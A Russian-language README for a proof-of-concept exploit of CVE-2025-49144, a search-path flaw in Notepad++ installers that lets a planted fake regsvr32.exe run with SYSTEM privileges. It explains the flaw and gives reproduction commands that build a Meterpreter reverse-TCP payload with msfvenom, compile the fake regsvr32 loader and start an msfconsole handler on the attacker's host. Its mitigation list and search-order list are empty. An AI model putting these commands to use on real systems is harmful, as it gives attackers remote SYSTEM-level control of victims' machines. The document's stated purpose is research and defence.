
CVE-2025-49144 PoC для исследователей безопасности для тестирования и проверки.

📌 CVE-2025-49144 — это уязвимость локального повышения привилегий высокой степени серьезности, обнаруженная в установщиках Notepad++ версии 8.8.1 и более ранних. Эта уязвимость возникает из-за неконтролируемого поведения пути поиска исполняемых файлов во время установки, что позволяет локальному злоумышленнику получить привилегии уровня SYSTEM, помещая вредоносные исполняемые файлы в тот же каталог, что и установщик.
⚙️ Как работает CVE – пошагово:
🧱 1. Что пошло не так в установщике?
Установщик Notepad++ (до версии 8.8.2) вызывает regsvr32.exe для регистрации некоторых компонентов, но делает это без указания полного пути (например, C:\Windows\System32\regsvr32.exe).
Вместо этого он просто выполняет:
regsvr32.exe some_dll
📂 2. Поведение пути поиска Windows:
Когда исполняемый файл запускается без полного пути, Windows использует определенный порядок поиска для его нахождения:
Таким образом, если поддельный regsvr32.exe помещен в ту же папку, что и установщик (например, Downloads), Windows будет использовать его раньше настоящего.
💣 3. Эксплуатация:
- Злоумышленник помещает вредоносный regsvr32.exe в ту же папку, что и легитимный установщик Notepad++ (например, в папку Downloads жертвы).
- Жертва запускает установщик (думая, что он безопасен).
- Установщик вызывает regsvr32.exe, но в итоге выполняет вредоносный из той же папки — с привилегиями SYSTEM (поскольку установщики обычно запрашивают права администратора).
- Полезная нагрузка злоумышленника теперь работает как NT AUTHORITY\SYSTEM.
⚙️ Шаги для воспроизведения:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST X.X.X.X
set LPORT 4444
run
Примечание: Это PoC, поэтому тестирование проводилось с отключенными Защитником Windows и защитой в реальном времени.
✅ Смягчение
Пользователям и администраторам следует:
Группам безопасности следует регулярно аудировать пути установки, контролировать права на запись и наблюдать за поведением во время выполнения установщика, чтобы уменьшить поверхность атаки.
Лицензия MIT — Бесплатно только для образовательных, исследовательских и защитных целей.
Приветствуются запросы на слияние (Pull Requests) — улучшайте обнаружение, добавляйте функции или предлагайте исправления.
Этот PoC предназначен только для образовательных и исследовательских целей. Используйте его на свой страх и риск. Автор не несет ответственности за любое неправомерное использование или причиненный ущерб.